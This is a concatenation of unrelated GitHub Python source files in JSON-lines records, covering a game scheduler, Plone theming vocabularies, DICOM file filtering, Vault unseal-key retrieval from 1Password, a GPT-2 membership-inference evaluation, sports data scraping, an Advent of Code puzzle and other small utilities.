3.14, None)\n\n\tdef __init__(self, pump):\n\t\tsuper().__init__()\n\t\tself.schedule = []\n\t\tself.pump = pump\n\t\tself.pump.append(self.tick)\n\n\tdef tick(self):\n\t\t\"\"\"Threads main loop\n\t\t@param tick_id: int id of the tick.\n\t\t\"\"\"\n\t\twhile self.schedule:\n\t\t\telem = self.schedule[0] # heap, first elem is smallest\n\t\t\tif elem[0] <= time.time():\n\t\t\t\tdont_use = heapq.heappop(self.schedule)\n\t\t\t\tassert dont_use is elem\n\t\t\t\tobj = elem[1]\n\t\t\t\tobj.callback()\n\t\t\t\tif obj.loops > 0 or obj.loops == -1:\n\t\t\t\t\tself.add_object(obj) # re-add object\n\t\t\telse:\n\t\t\t\tbreak\n\n\tdef add_object(self, obj):\n\t\t\"\"\"Adds a new CallbackObject instance to the callbacks list\n\t\t@param object: CallbackObject type object, containing all necessary information\n\t\t\"\"\"\n\t\tif obj.loops > 0:\n\t\t\tobj.loops -= 1\n\t\t# sort by first entry, which is execution time\n\t\theapq.heappush(self.schedule, [(time.time() + obj.run_in), obj])\n\n\tdef add_new_object(self, callback, class_instance, run_in=1, loops=1):\n\t\t\"\"\"Creates a new CallbackObject instance and calls the self.add_object() function.\n\t\t@param callback: function callback, which is called run_in time.\n\t\t@param class_instance: class instance the function belongs to.\n\t\t@param run_in: float number of seconds after which the callback is called. Standard is 1, run next second.\n\t\t@param loops: How often the callback is called. -1 = infinite times. Standard is 1, run once.\"\"\"\n\t\tobj = _ExtCallbackObject(callback, class_instance, run_in, loops)\n\t\tself.add_object(obj)\n\n\tdef rem_all_classinst_calls(self, class_instance):\n\t\t\"\"\"Removes all callbacks from the scheduler that belong to the class instance class_inst.\n\t\t@return: number of removed callbacks\"\"\"\n\t\tfor tup in self.schedule:\n\t\t\tif tup[1].class_instance is class_instance:\n\t\t\t\t# don't destroy heap\n\t\t\t\ttup[1] = self.__class__.NOOP\n\n\tdef rem_call(self, instance, callback):\n\t\t\"\"\"Removes all callbacks of 'instance' that are 'callback'\n\t\t@param instance: the instance that would execute the call\n\t\t@param callback: the function to remove\n\t\t\"\"\"\n\t\tfor tup in self.schedule:\n\t\t\tif tup[1].class_instance is instance and tup[1].callback == callback:\n\t\t\t\t# don't destroy heap\n\t\t\t\ttup[1] = self.__class__.NOOP\n\n\tdef __del__(self):\n\t\tself.schedule = []\n\t\tself.pump.remove(self.tick)\n\t\tself.pump = None\n","repo_name":"unknown-horizons/unknown-horizons","sub_path":"horizons/extscheduler.py","file_name":"extscheduler.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":1376,"dataset":"github-code","pt":"51"} +{"seq_id":"17905919066","text":"# -*- coding: utf-8 -*-\n\"\"\"Vocabularies used by spirit.plone.theming.\"\"\"\n\nfrom plone import api as ploneapi\nfrom plone.api.exc import InvalidParameterError\nfrom plone.registry.interfaces import IRegistry\nfrom spirit.plone.theming import _\nfrom spirit.plone.theming.interfaces import IPloneThemingVocabularies\nfrom zope.component import getUtility\nfrom zope.globalrequest import getRequest\nfrom zope.interface import implementer\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom zope.schema.vocabulary import SimpleTerm\nfrom zope.schema.vocabulary import SimpleVocabulary\n\n\nclass BaseVocabulary(object):\n \"\"\"A base vocabulary class.\"\"\"\n\n def _get_registry_record(self, name=None):\n try:\n return ploneapi.portal.get_registry_record(\n name=name,\n interface=IPloneThemingVocabularies,\n )\n except InvalidParameterError:\n return\n except KeyError:\n registry = getUtility(IRegistry)\n registry.registerInterface(IPloneThemingVocabularies)\n try:\n return ploneapi.portal.get_registry_record(\n name=name,\n interface=IPloneThemingVocabularies,\n )\n except (KeyError, InvalidParameterError):\n ploneapi.portal.show_message(\n message=_(\n u'Please upgrade or reinstall spirit.plone.theming',\n ),\n request=getRequest(),\n )\n return\n\n\n@implementer(IVocabularyFactory)\nclass AvailableHeaderOptionsVocabulary(BaseVocabulary):\n \"\"\"Vocabulary for available header options.\"\"\"\n\n def __call__(self, context):\n\n options = self._get_registry_record(name='available_header_options')\n\n items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n return SimpleVocabulary(items)\n\n\n@implementer(IVocabularyFactory)\nclass AvailableFooterOptionsVocabulary(BaseVocabulary):\n \"\"\"Vocabulary for available footer options.\"\"\"\n\n def __call__(self, context):\n\n options = self._get_registry_record(name='available_footer_options')\n\n items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n return SimpleVocabulary(items)\n\n\n@implementer(IVocabularyFactory)\nclass AvailableColorOptionsVocabulary(BaseVocabulary):\n \"\"\"Vocabulary for available color options.\"\"\"\n\n def __call__(self, context):\n\n options = self._get_registry_record(name='available_color_options')\n\n items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n return SimpleVocabulary(items)\n\n\n@implementer(IVocabularyFactory)\nclass AvailablePatternOptionsVocabulary(BaseVocabulary):\n \"\"\"Vocabulary for available pattern options.\"\"\"\n\n def __call__(self, context):\n\n options = self._get_registry_record(name='available_pattern_options')\n\n items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n return SimpleVocabulary(items)\n\n\n@implementer(IVocabularyFactory)\nclass AvailableLayoutOptionsVocabulary(BaseVocabulary):\n \"\"\"Vocabulary for available layout options.\"\"\"\n\n def __call__(self, context):\n\n options = self._get_registry_record(name='available_layout_options')\n\n items = [SimpleTerm(value=i, title=i) for i in sorted(options)]\n return SimpleVocabulary(items)\n","repo_name":"it-spirit/spirit.plone.theming","sub_path":"src/spirit/plone/theming/vocabularies.py","file_name":"vocabularies.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"37180008348","text":"\"\"\"\nThis script is used to extract the dicom data to specific file, according the tags we want\nCreated by chenmingliang in 2020/11/17\n\n\"\"\"\nimport pydicom\nimport os\nimport shutil\n\n# tags = ['Exposure', 'KVP', 'ConvolutionKernel', 'SliceThickness']\n# standard1 = [10, 120, 'CHEST_STND', 1]\n# standard2 = [10, 120, 'LIMB_STND', 1]\n# standard = [standard1, standard2]\ntags = ['ConvolutionKernel']\nstandard = [['LIMB_BONE']]\nori_path = 'E:\\卷叠伪影\\XFFS\\Jupiter\\\\test'\nTarget_path = './Data'\n\ndef loadFileInformation(filename):\n\n information = {}\n ds = pydicom.read_file(filename)\n for tag in tags:\n tmp = 'ds.' + tag\n information[tag] = eval(tmp)\n # information[tags[0]] = ds.Exposure\n # information[tags[1]] = ds.SliceThickness\n # information[tags[2]] = ds.ConvolutionKernel\n # information[tags[3]] = ds.KVP\n # information[tags[4]] = ds.StationName\n return information\n\n\ndef Is_file(information):\n\n \"\"\"\n This function is used to choose the specific file, according the demand.\n :return:\n \"\"\"\n for standard_tmp in standard:\n is_file = True\n for count in range(len(information)):\n if information[tags[count]] == standard_tmp[count]:\n continue\n else:\n is_file = False\n break\n if is_file:\n break\n else:\n continue\n return is_file\n\n\ndef copy_file(inputPath, targetPath, count):\n if os.path.exists(targetPath):\n shutil.rmtree(targetPath)\n shutil.copytree(inputPath, targetPath)\n print('Finish %d dir' % count)\n\nif __name__ == '__main__':\n # file = 'E:\\CT_Lung_normal\\lowdoeschest_dupu\\\\120kv_160ma_30ma_0.5\\DPC004663\\lung\\\\5mm\\\\normal'\n # filenames = os.listdir(file)\n # for i in filenames:\n # d = loadFileInformation(os.path.join(file, i))\n\n count = 0\n for root, dirs, files in os.walk(ori_path):\n if not files == []:\n if os.path.splitext(files[0])[-1] == '.dcm':\n if len(files) > 30:\n tmp_file = os.path.join(root, files[0])\n info = loadFileInformation(tmp_file)\n is_file = Is_file(info)\n if is_file:\n count += 1\n target_path = os.path.join(Target_path, str(count))\n copy_file(root, target_path, count)\n","repo_name":"chris1992212/Dicom-tools","sub_path":"DataCopy_tag.py","file_name":"DataCopy_tag.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14272662370","text":"import json\nimport subprocess\nimport sys\n\nfrom .run import run_cmd\n\n\ndef get_config_op_legacy(config):\n op = config.get('ob_binary', 'op')\n try:\n op_legacy_check_existing_vault(config)\n except subprocess.CalledProcessError:\n print('You need to be logged with:')\n print(f'eval $({op} signin)')\n sys.exit(1)\n try:\n uuid = op_legacy_get_item_id(config, config['op_title'])\n except KeyError:\n print('Unknown config in 1password: {}'.format(config['op_title']))\n print('Config:')\n print(config)\n sys.exit(1)\n\n\n json = op_legacy_get_data(config, uuid)\n fields = op_legacy_get_item(json)\n data = op_legacy_extract_from_item(config, fields)\n if 'root_token' not in data:\n data['root_token'] = op_legacy_extract_from_password(json)\n return data\n\n\ndef op_legacy_get_item_id(config, title):\n item_list = op_legacy_get_vault_item_list(config)\n return(item_list[title])\n\n\ndef op_legacy_get_vault_item_list(config):\n op = config.get('ob_binary', 'op')\n item_list = {}\n stream = run_cmd('{} list items --vault={}'.format(\n op,\n config['op_vault']))\n data = json.loads(stream)\n\n for item in data:\n uuid = item['uuid']\n title = item.get('overview', {}).get('title', None)\n item_list[title] = uuid\n\n return item_list\n\n\ndef op_legacy_check_existing_vault(config):\n op = config.get('ob_binary', 'op')\n vault_list = []\n\n stream = run_cmd(f'{op} list vaults')\n data = json.loads(stream)\n for vault in data:\n vault_list.append(vault['name'])\n if config['op_vault'] not in vault_list:\n print('Need to login with:')\n print(f'eval $({op} signin)')\n sys.exit(1)\n\n\ndef op_legacy_get_data(config, uuid):\n op = config.get('ob_binary', 'op')\n stream = run_cmd('{} get item {} --vault={}'.format(\n op,\n uuid,\n config['op_vault'],\n ))\n data = json.loads(stream)\n return data\n\n\ndef op_legacy_get_item(data):\n sections = data.get('details', {}).get('sections', {})\n return op_legacy_extract_fields(sections)\n\n\ndef op_legacy_extract_fields(sections):\n fields_list = {}\n for section in sections:\n fields = section.get('fields', None)\n if fields:\n for field in fields:\n fields_list[field['t']] = field['v']\n return fields_list\n\n\ndef op_legacy_extract_from_item(config, fields):\n data = {}\n\n if 'op_fields_root_token' in config:\n data['root_token'] = fields[config['op_fields_root_token']]\n unseal_keys = []\n for i in range(1, 10):\n last_value = fields.get(config['op_firlds_unseal_keys'].format(i), None)\n if last_value:\n unseal_keys.append(last_value)\n\n data['unseal_keys'] = unseal_keys\n\n return data\n\n\ndef op_legacy_extract_from_password(data):\n fields = data.get('details', {}).get('fields', {})\n for field in fields:\n if field.get('name', '') == 'password':\n return field.get('value')\n","repo_name":"nledez/vault_python_unseal","sub_path":"unseal_vault/op_legacy.py","file_name":"op_legacy.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"6723874155","text":"from transformers import GPT2LMHeadModel, GPT2Tokenizer\nimport os\nimport argparse\nfrom tqdm import tqdm\nimport torch\nimport pandas as pd\nimport json\n\n\ndef get_all_texts(split):\n df = pd.read_csv(f'twitter_split_{split}.csv', header=None)\n texts = df[6].to_list()\n print(texts[:10])\n \n return texts[:20000]\n\ndef get_all_texts_clean(split):\n df = pd.read_csv(f'twitter_split_{split}.csv', header=None)\n texts = df[6].to_list()\n print(texts[:10])\n \n return [t.strip('<|endoftext|>') for t in texts][:20000]\n\n\nclass TextDataset(torch.utils.data.Dataset):\n def __init__(self, texts):\n self.train_texts = texts\n\n def __len__(self):\n return len(self.train_texts)\n\n def __getitem__(self, index):\n return self.train_texts[index]\n\n\n\n\ndef eval_ppl(texts_eval, model_name):\n print(f\"evaluating {model_name}\")\n\n tokenizer = GPT2Tokenizer.from_pretrained('gpt2')\n tokenizer.pad_token = tokenizer.eos_token\n model = GPT2LMHeadModel.from_pretrained(model_name)\n model = model.to('cuda:2')\n\n\n test_dataset = TextDataset(texts_eval)\n eval_dataloader = torch.utils.data.DataLoader(test_dataset, shuffle=True, batch_size=16)\n\n\n\n model.eval()\n epoch_loss = 0\n losses = []\n with torch.no_grad():\n for texts in tqdm(eval_dataloader):\n text_tokenized = tokenizer(texts, padding = True, truncation = True, max_length = 70, return_tensors='pt').input_ids.to('cuda:2')\n loss = model(text_tokenized, labels=text_tokenized).loss\n\n epoch_loss += loss.item()\n losses.append(loss.item())\n\n print(\"evaluation loss\", 16*epoch_loss/len(test_dataset))\n return losses\n\n\nif __name__ == '__main__':\n texts_eval = get_all_texts_clean(1)\n l1_ = eval_ppl(texts_eval, \"gpt2\")\n l2_ = eval_ppl(texts_eval, \"twitter_model_target_epoch_4\")\n\n non_member_differences = [l2-l1 for l1, l2 in zip(l1_, l2_)]\n\n texts_eval = get_all_texts_clean(0)\n l1_ = eval_ppl(texts_eval, \"gpt2\")\n l2_ = eval_ppl(texts_eval, \"twitter_model_target_epoch_4\")\n member_differences = [l2-l1 for l1, l2 in zip(l1_, l2_)]\n\n\n print(\"lengths\", len(member_differences))\n print(\"mean diff members\", sum(member_differences)/len(member_differences))\n print(\"mean diff non members\", sum(non_member_differences)/len(non_member_differences))\n\n prev_fpr = 0\n factor = 1\n for i in range(10000):\n median_index = i\n median = sorted(member_differences+non_member_differences)[median_index]\n\n\n tp = 0\n fn = 0\n for diff in member_differences:\n if diff <= median:\n tp += 1\n\n else:\n fn += 1\n\n tn = 0\n fp = 0\n for diff in non_member_differences:\n if diff > median:\n tn += 1\n else:\n fp += 1\n\n if prev_fpr < 0.1 and fp/(fp+tn) >= 0.1:\n print(\"tpr\", tp/(tp+fn))\n print(\"fpr\", fp/(fp+tn))\n break\n\n if prev_fpr < 0.01 and fp/(fp+tn) >= 0.01:\n print(\"tpr\", tp/(tp+fn))\n print(\"fpr\", fp/(fp+tn))\n\n if prev_fpr < 0.001 and fp/(fp+tn) >= 0.001:\n print(\"tpr\", tp/(tp+fn))\n print(\"fpr\", fp/(fp+tn))\n\n if prev_fpr < 0.0001 and fp/(fp+tn) >= 0.0001:\n print(\"tpr\", tp/(tp+fn))\n print(\"fpr\", fp/(fp+tn))\n\n\n prev_fpr = fp/(fp+tn)","repo_name":"justusmattern27/guided-extraction","sub_path":"evaluate_ppl.py","file_name":"evaluate_ppl.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28139319157","text":"\"\"\"\nfor pdf document list from $document dir\n\"\"\"\n# -*- coding: utf-8 -*-\n#coding=utf-8\n\nimport sys\nimport os\nimport json\nimport logging\n\nconfigEnvir = 'test'\nDocumentConfigFile = './'\nDocument_Dir = './documents/'\nDocument_Type = '.pdf'\n\nlogging.basicConfig(filename='alarm_logger.log', level=logging.INFO)\n\ndef getDocumentInfo(configType):\n global DocumentConfigFile\n global Document_Dir\n global Document_Type\n\n scriptsPath = os.path.abspath(os.path.dirname(__file__))\n \n DocumentConfigFile = scriptsPath + '/config/api_options.json'\n if (configType == 'test'):\n DocumentConfigFile = scriptsPath + '/config/api_options.json'\n elif (configType == 'rtm'):\n DocumentConfigFile = scriptsPath + '/config/rtm/api_options.json'\n \n if(os.path.exists(DocumentConfigFile)):\n try:\n #print DocumentConfigFile\n configFile = open(DocumentConfigFile)\n configFileContent = configFile.read()\n #print configFileContent\n result = json.loads(configFileContent)\n #print str(result)\n Document_Dir = result['document_dir']\n Document_Type = result['document_type']\n #print Document_Dir\n #print Document_Type\n except Exception as e: \n logging.error('Config File %s Read Failed (detail: %s) ' % (DocumentConfigFile, e))\n else:\n logging.info('Config File %s Can not be found' % (DocumentConfigFile))\n \n\nif __name__ == \"__main__\":\n #print 'begin get document list'\n\n if len(sys.argv) > 1:\n configEnvir = sys.argv[1]\n else:\n logging.error('Usage: %s %s [%s] [%s]' % (sys.argv[0], 'test/rtm', 'Document_Dir', 'Document_Type'))\n exit(1)\n \n # get config dir name and file type\n getDocumentInfo(configEnvir)\n \n if len(sys.argv) > 2:\n Document_Config_str = sys.argv[2]\n try:\n Document_Config = json.loads(Document_Config_str)\n Document_Dir = Document_Config.document_dir or Document_Dir\n Document_Type = Document_Config.document_type or Document_Type\n except Exception as e:\n logging.error('Params filter error detail: %s' % e )\n\n return_file_list = []\n\n logging.info(Document_Dir)\n logging.info(Document_Type)\n try:\n if (os.path.isdir(Document_Dir)):\n logging.info('dir %s exists' % Document_Dir)\n filelist = os.listdir(Document_Dir)\n for file in filelist:\n if(len(file.split('.'))>1):\n #logging.info('file name: %s' % file)\n filetype = file.split('.')[1]\n if (Document_Type.find(filetype)>0):\n logging.info('file name: %s' % file)\n return_file_list.append(file)\n else:\n logging.error('dir %s not exists' % Document_Dir)\n except Exception as e:\n logging.error('Documents Dir filter Failed. (detail: %s)' % e)\n\n print(json.dumps(return_file_list))\n logging.info(json.dumps(return_file_list))\n\n \n","repo_name":"huykai/shmcc_website_nodejs","sub_path":"scripts/getDocumentList.py","file_name":"getDocumentList.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73622838559","text":"#===================================================================\n# Data Spliting \n#===================================================================\ndef timeslicing(Exp,Exp3,start_date, end_date, last_date):\n \"\"\"\n Inputs\n ------\n start_date str : the start date from which to extract\n end_date str : the end date \n outputs\n -------\n \"\"\"\n \n #=====================Experiment 1,2,4a-d \n X_training_exp = Exp.sel(time = slice(start_date, end_date))\n X_test_exp = Exp.sel(time = slice(end_date+1, last_date)) \n \n #===================== Experiment 3\n Y_trainging_exp3 = Exp3.sel(time=slice(start_date, end_date))\n Y_test_exp3 = Exp3.sel(time = slice(end_date+1, last_date))\n \n return X_training_exp, X_test_exp, Y_trainging_exp3, Y_test_exp3","repo_name":"kachingasilwimba/Comprehensive-exam","sub_path":"Computing_Artifact/.ipynb_checkpoints/data_spliting-checkpoint.py","file_name":"data_spliting-checkpoint.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"74581293597","text":"# Standard Library\nimport os\nimport logging\n\n# Third Party Library\nfrom selenium.common.exceptions import NoSuchElementException\n\n# My Libary\nfrom MyBot.bot import Bot\nfrom MyBot.settings import env\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter(\n fmt=\"%(asctime)s: %(levelname)-8s: %(name)s %(funcName)s(): %(message)s\",\n datefmt=\"%H:%M:%S\",\n)\n\nfile_handler = logging.FileHandler(\"bot.log\")\nfile_handler.setLevel(logging.WARNING)\nfile_handler.setFormatter(formatter)\n\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\n\nlogger.addHandler(file_handler)\nlogger.addHandler(stream_handler)\n\nDYNAMIC_FUNCTION = \"burroughs_rift_instructions\"\n\n\ndef prepare(bot: Bot) -> None:\n instruction = env(DYNAMIC_FUNCTION)\n\n try:\n globals()[instruction](bot)\n # needs to pop because read_env does not override the env variables\n os.environ.pop(DYNAMIC_FUNCTION)\n except KeyError:\n logger.debug(f\"The function {instruction} does not exists.\")\n\n\n# helper for burrough rift\ndef isMisting(bot: Bot) -> bool:\n bot.driver.implicitly_wait(1)\n try:\n bot.driver.find_element_by_class_name(\"is_misting\")\n bot.driver.implicitly_wait(5)\n return True\n except NoSuchElementException:\n bot.driver.implicitly_wait(5)\n return False\n\n\ndef mistIsGTE19(bot: Bot) -> bool:\n return (\n int(\n bot.driver.find_elements_by_class_name(\"mistQuantity\")[0]\n .get_attribute(\"innerText\")\n .split(\"/\")[0]\n )\n >= 19\n )\n\n\ndef mistIsGTE16(bot: Bot) -> bool:\n return (\n int(\n bot.driver.find_elements_by_class_name(\"mistQuantity\")[0]\n .get_attribute(\"innerText\")\n .split(\"/\")[0]\n )\n >= 16\n )\n\n\ndef toggleMist(bot: Bot) -> None:\n bot.driver.find_elements_by_class_name(\"mistButton\")[0].click()\n\n\ndef onMist(bot: Bot) -> None:\n if isMisting(bot):\n pass\n else:\n toggleMist(bot)\n\n\ndef offMist(bot: Bot) -> None:\n if isMisting(bot):\n toggleMist(bot)\n else:\n pass\n\n\ndef maintainMistInRed(bot: Bot) -> None:\n logger.debug(f\"maintaining mist in red\")\n if mistIsGTE19(bot):\n offMist(bot)\n else:\n onMist(bot)\n\n\ndef maintainMistInGreen(bot: Bot) -> None:\n logger.debug(f\"maintaining mist in green\")\n if mistIsGTE16(bot):\n offMist(bot)\n else:\n onMist(bot)\n","repo_name":"ANGkeith/Web-Bot","sub_path":"src/MyBot/environments/burroughs_rift.py","file_name":"burroughs_rift.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21042329943","text":"yen = 1000\nN = int(input())\nrest = yen - N\n\nyen_list = [500,100,50,10,5,1]\nresult = 0\n\nfor _ in yen_list:\n if rest // _ > 0:\n result += rest//_\n rest %= _\n\nprint(result)","repo_name":"qkrwlsgh1011/python_practice","sub_path":"23_04_06.py","file_name":"23_04_06.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42179906050","text":"from pathlib import Path\nimport requests\n\ndata_folder = './raw_daily_data'\n\nPath(data_folder).mkdir(parents=True, exist_ok=True)\n\ngame_url = 'https://www.blaseball.com/database/games?day={day}&season={season}'\n\nstart_season = 0\nend_season = 10\n\nfor season in range(start_season, end_season+1):\n\tseason_folder = data_folder + '/season_{season}'\n\tPath(season_folder.format(season=season)).mkdir(parents=True, exist_ok=True)\n\n\tday = 0\n\twhile True:\n\t\tday_file = season_folder + '/day_{day:02}.json'\n\t\tif Path(day_file.format(season=season, day=day)).is_file():\n\t\t\tprint('Already have day {day} of season {season}'.format(day=day+1, season=season+1))\n\t\t\tday += 1\n\t\t\tcontinue\n\n\t\tresp = requests.get(game_url.format(day=day, season=season))\n\t\tif resp.text == '[]':\n\t\t\tbreak\n\t\twith open('./raw_daily_data/season_{season}/day_{day:02}.json'.format(season=season, day=day), 'w') as f:\n\t\t\tf.write(resp.text)\n\t\tprint('Finished day {} of season {}'.format(day+1, season+1));\n\t\tday += 1\n","repo_name":"Thingo314/blaseball-elo","sub_path":"main/pull_data.py","file_name":"pull_data.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70479425758","text":"setup, moves = open(\"input.txt\").read().split(\"\\n\\n\")\n\nsetup = setup.split(\"\\n\")\n\nnumstacks = len(setup[-1].split())\nstack1 = [[] for _ in range(numstacks)]\nstack2 = [[] for _ in range(numstacks)]\n\nfor line in reversed(setup[:-1]):\n for i, j in enumerate(range(1, 1 + numstacks * 4, 4)):\n if line[j].isalpha():\n stack1[i].append(line[j])\n stack2[i].append(line[j])\n\nfor line in moves.split(\"\\n\"):\n _, num, _, source, _, dest = line.split()\n num, source, dest = map(int, [num, source, dest])\n for j in range(num):\n stack1[dest - 1].append(stack1[source - 1].pop())\n\n stack2[dest - 1].extend(stack2[source - 1][-num:])\n del stack2[source - 1][-num:]\n\nprint(\"\".join([stack[-1] for stack in stack1])) # GFTNRBZPF\nprint(\"\".join([stack[-1] for stack in stack2])) # VRQWPDSGP\n","repo_name":"einarsi/adventofcode","sub_path":"day05_supply_stacks/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"658771513","text":"from abc import ABC, abstractmethod\nfrom typing import Dict, List, Tuple\n\nimport networkx as nx\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom pytorch_gleam.data.datasets.kbi_misinfo_stance import flip_tm_stance\n\n\nclass ConsistencyScoring(nn.Module, ABC):\n def __init__(self):\n super().__init__()\n\n @abstractmethod\n def forward(\n self,\n adj_list: List[Tuple[str, str, Tuple[float, float]]],\n node_labels: Dict[str, int],\n ) -> Tuple[np.array, Dict[str, int]]:\n pass\n\n\nclass MultiHopConsistencyScoring(ConsistencyScoring):\n def __init__(self, num_steps: int = 1, num_classes: int = 3):\n super().__init__()\n self.num_steps = num_steps\n self.num_classes = num_classes\n\n def initialize(self, adj_list, seed_node_labels):\n g = nx.Graph()\n # list of (ex_t_id, ex_p_id, ex_tmp_energy)\n # 0 - entail\n # 1 - contradict\n nodes = set()\n unlabeled_nodes = []\n labeled_nodes = []\n node_idx = {}\n for t_id, p_id, tp_r_dists in adj_list:\n if t_id not in nodes:\n node_idx[t_id] = len(node_idx)\n if t_id in seed_node_labels:\n labeled_nodes.append(t_id)\n else:\n unlabeled_nodes.append(t_id)\n if p_id not in nodes:\n node_idx[p_id] = len(node_idx)\n if p_id in seed_node_labels:\n labeled_nodes.append(p_id)\n else:\n unlabeled_nodes.append(p_id)\n\n nodes.add(t_id)\n nodes.add(p_id)\n entail_weight, contradict_weight = tp_r_dists\n entail_weight = -entail_weight.item()\n contradict_weight = -contradict_weight.item()\n g.add_edge(\n t_id,\n p_id,\n entail_weight=entail_weight,\n contradict_weight=contradict_weight,\n )\n return g, unlabeled_nodes, labeled_nodes, node_idx\n\n def propagate_seeds(\n self,\n labeled_nodes,\n unlabeled_nodes,\n graph,\n nls,\n nlc,\n seed_node_labels,\n node_idx,\n ):\n for node in unlabeled_nodes:\n for other_node in labeled_nodes:\n other_label = seed_node_labels[other_node]\n if isinstance(other_label, torch.Tensor):\n other_label = other_label.item()\n # entailment, contradiction, or neither does not mean anything if we know\n # the label of the other node\n if other_label == 0:\n continue\n edge = graph.get_edge_data(node, other_node)\n entail_score = edge[\"entail_weight\"]\n entail_label = other_label\n contradict_score = edge[\"contradict_weight\"]\n contradict_label = flip_tm_stance(other_label)\n n_idx = node_idx[node]\n nls[n_idx, entail_label, 0] += entail_score\n nlc[n_idx, entail_label, 0] += 1\n nls[n_idx, contradict_label, 0] += contradict_score\n nlc[n_idx, contradict_label, 0] += 1\n nls[:, :, 0] = nls[:, :, 0] / nlc[:, :, 0]\n\n def propagate(self, nodes, graph, nls, nlc, step, node_idx):\n for node in nodes:\n for other_node in nodes:\n if node == other_node:\n continue\n edge = graph.get_edge_data(node, other_node)\n entail_score = edge[\"entail_weight\"]\n contradict_score = edge[\"contradict_weight\"]\n n_idx = node_idx[node]\n o_idx = node_idx[other_node]\n for other_pred in [1, 2]:\n entail_label = other_pred\n contradict_label = flip_tm_stance(other_pred)\n node_score = nls[o_idx, other_pred, step - 1]\n # node_count = nlc[o_idx, other_pred, step-1]\n nls[n_idx, entail_label, step] += node_score + entail_score\n nlc[n_idx, entail_label, step] += 1\n nls[n_idx, contradict_label, step] += node_score + contradict_score\n nlc[n_idx, contradict_label, step] += 1\n nls[:, :, step] = nls[:, :, step] / nlc[:, :, step]\n\n def forward(\n self,\n adj_list: List[Tuple[str, str, Tuple[float, float]]],\n node_labels: Dict[str, int],\n ) -> Tuple[np.array, Dict[str, int]]:\n assert len(node_labels) > 0\n\n graph, unlabeled_nodes, labeled_nodes, node_idx = self.initialize(adj_list, node_labels)\n num_steps = self.num_steps\n # no need to do any propagation steps if there are no paths in unlabeled graph\n if len(unlabeled_nodes) == 1:\n num_steps = 0\n\n # [num_nodes, num_labels, num_steps]\n nls = np.zeros([len(node_idx), self.num_classes, num_steps + 1], dtype=np.float32)\n nlc = np.zeros([len(node_idx), self.num_classes, num_steps + 1], dtype=np.float32)\n nlc[:, 0, :] = 1.0\n for node in labeled_nodes:\n n_idx = node_idx[node]\n nlc[n_idx, :, :] = 1.0\n\n self.propagate_seeds(labeled_nodes, unlabeled_nodes, graph, nls, nlc, node_labels, node_idx)\n\n for s_idx in range(1, num_steps + 1):\n self.propagate(unlabeled_nodes, graph, nls, nlc, s_idx, node_idx)\n\n nls = nls.mean(axis=-1)\n nls[:, 0] = nls[:, 1:].min()\n\n return nls, node_idx\n\n\nclass MultiHopLogConsistencyScoring(MultiHopConsistencyScoring):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def initialize(self, adj_list, seed_node_labels):\n g = nx.Graph()\n # list of (ex_t_id, ex_p_id, ex_tmp_energy)\n # 0 - entail\n # 1 - contradict\n nodes = set()\n unlabeled_nodes = []\n labeled_nodes = []\n node_idx = {}\n for t_id, p_id, tp_r_dists in adj_list:\n if t_id not in nodes:\n node_idx[t_id] = len(node_idx)\n if t_id in seed_node_labels:\n labeled_nodes.append(t_id)\n else:\n unlabeled_nodes.append(t_id)\n if p_id not in nodes:\n node_idx[p_id] = len(node_idx)\n if p_id in seed_node_labels:\n labeled_nodes.append(p_id)\n else:\n unlabeled_nodes.append(p_id)\n\n nodes.add(t_id)\n nodes.add(p_id)\n entail_weight, contradict_weight = tp_r_dists\n entail_weight = -np.log(entail_weight.item())\n contradict_weight = -np.log(contradict_weight.item())\n g.add_edge(\n t_id,\n p_id,\n entail_weight=entail_weight,\n contradict_weight=contradict_weight,\n )\n return g, unlabeled_nodes, labeled_nodes, node_idx\n","repo_name":"Supermaxman/pytorch-gleam","sub_path":"pytorch_gleam/inference/consistency_scoring.py","file_name":"consistency_scoring.py","file_ext":"py","file_size_in_byte":6964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"19413556417","text":"# some testing code around multiprocessing\r\n# https://www.youtube.com/watch?v=fKl2JW_qrso\r\n\r\nimport multiprocessing\r\nimport time\r\n#revise to include the use of running multiprocessing in main()\r\n#second edit lorem ipsum\r\n\r\n\r\n\r\n#the function now takes an argument called 'seconds'\r\n\r\ndef do_something(seconds):\r\n print(f'Sleeping {seconds} second(s)....')\r\n time.sleep(seconds)\r\n print('done sleeping...')\r\n\r\n# below, two multiprocessing object are created.\r\n# these objects dont 